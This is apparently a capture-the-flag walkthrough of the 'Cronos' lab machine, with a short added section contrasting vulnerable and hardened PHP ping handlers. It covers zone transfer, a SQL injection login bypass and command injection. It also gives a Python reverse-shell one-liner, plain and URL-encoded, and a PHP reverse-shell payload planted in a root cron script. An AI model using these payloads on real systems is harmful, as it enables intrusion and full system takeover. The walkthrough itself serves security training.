# Cronos

## Service Enumeration

`nmapAutomator.sh -H 10.10.10.13 -t all`

![](/files/-MadsuhDPh9cSP6QZ00k)

We can perform a DNS zone transfer, guessing that the domain is `cronos.htb`:

`dig axfr @10.10.10.13 cronos.htb`

![](/files/-MadsyBjxBM22rS05PbC)

Here, we uncover some subdomains for `10.10.10.13`. Let's add them to our `/etc/hosts` file.

![](/files/-Madt0H8ovFbyDMaqUWZ)

Now, browsing to [www.cronos.htb](http://www.cronos.htb) and admin.cronos.htb yields a valid webpage on each host.

## Exploitation

The `admin.cronos.htb` login page is vulnerable to SQL injection. Using the payload:

`username=' or 1=1;#&password=`

we can bypass the authentication. Note that the same injection does not work in the password field.

![](/files/-Madt3BBYwWJm1AwFS9I)

We get access to the following tool:

![](/files/-Madt5v7VPVJEySt6pUB)

If we examine the POST request, we see that `ping -c 1` is sent as the `command` parameter, with the target in a separate `host` parameter. This suggests the server is not sanitizing the input and is passing the `command` parameter straight into the OS command it executes.

![](/files/-MadtBKAqodEncR-u0Am)

Indeed, changing to `-c 2` changes the command executed!

![](/files/-Madt8BwdoVpjBsMRm_C)
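The flaw described above is that the client controls the command string itself. The following is an added, constructed example (not the Cronos application's source code): a handler in the shape the writeup implies, followed by a hardened version in which the command is fixed server-side and only an allow-listed host reaches the shell.

```php
<?php
// Constructed example, not the Cronos application's own code.

// VULNERABLE: the client supplies both "command" and "host", and the server
// concatenates them into a shell command. Whatever arrives as "command"
// runs with the privileges of the web server user.
function vulnerable_ping(array $post): string
{
    $cmd = $post['command'] . ' ' . $post['host'];   // e.g. "ping -c 1 8.8.8.8"
    return (string) shell_exec($cmd);
}

// HARDENED: the command is fixed on the server, the only client input is the
// host, and that input must pass an allow-list check before it is quoted with
// escapeshellarg() and handed to the fixed binary.
function safe_ping(array $post): string
{
    $host = $post['host'] ?? '';

    // Accept either a literal IP address or a plain hostname (letters, digits
    // and hyphens in dot-separated labels). No shell metacharacter survives
    // this check, so the "command" parameter is never consulted at all.
    $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $isHostname = (bool) preg_match(
        '/^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i',
        $host
    );
    if (!$isIp && !$isHostname) {
        http_response_code(400);
        return "invalid host\n";
    }

    // Fixed argument list: the packet count is hard-coded and the host is a
    // single quoted argument, so "-c 2" or a chained command cannot be injected.
    $cmd = '/bin/ping -c 1 -W 2 ' . escapeshellarg($host);
    return (string) shell_exec($cmd);
}

// Only wire the handler up when running under a web SAPI.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain');
    echo safe_ping($_POST);
}
```

Running the same request with `command=ping -c 2` against `safe_ping()` has no effect, because the handler never reads that parameter; a host such as `8.8.8.8; id` is rejected by the allow-list before any shell is involved.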

We now have an RCE vulnerability. Executing the `which python` command shows that Python is installed on the server.

![](/files/-MadtDwFRVb-JmzLmq3x)

We can use a Python reverse shell payload:

`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`

After URL encoding, we can edit the `command` parameter:

`command=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.14.23%22%2C4242%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27&host=`

On our Netcat listener, we receive the reverse shell.

![](/files/-MadtHH2ZmHyijuDLXIA)

![](/files/-MadtJ_ClyjeZJswg8ZQ)

## Privilege Escalation

We can use LinPEAS to enumerate.

We find the following cron job that runs every minute:

![](/files/-MadtMSQtB-Sb16a9NOl)

The script that the cron job runs is a PHP script:

![](/files/-MadtQtJ2RMyVwOlxB8N)

We can change this to our custom PHP payload:

```php
<?php $sock=fsockopen("10.10.14.23",4242); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
```

![](/files/-MadtVp0BnY6RGWfxEba)

The next time the cron job is run, we obtain a root shell on our listener.

![](/files/-MadtZusC-iBH64zmlSn)

![](/files/-MadtbNnEz8L0X47d5_Y)

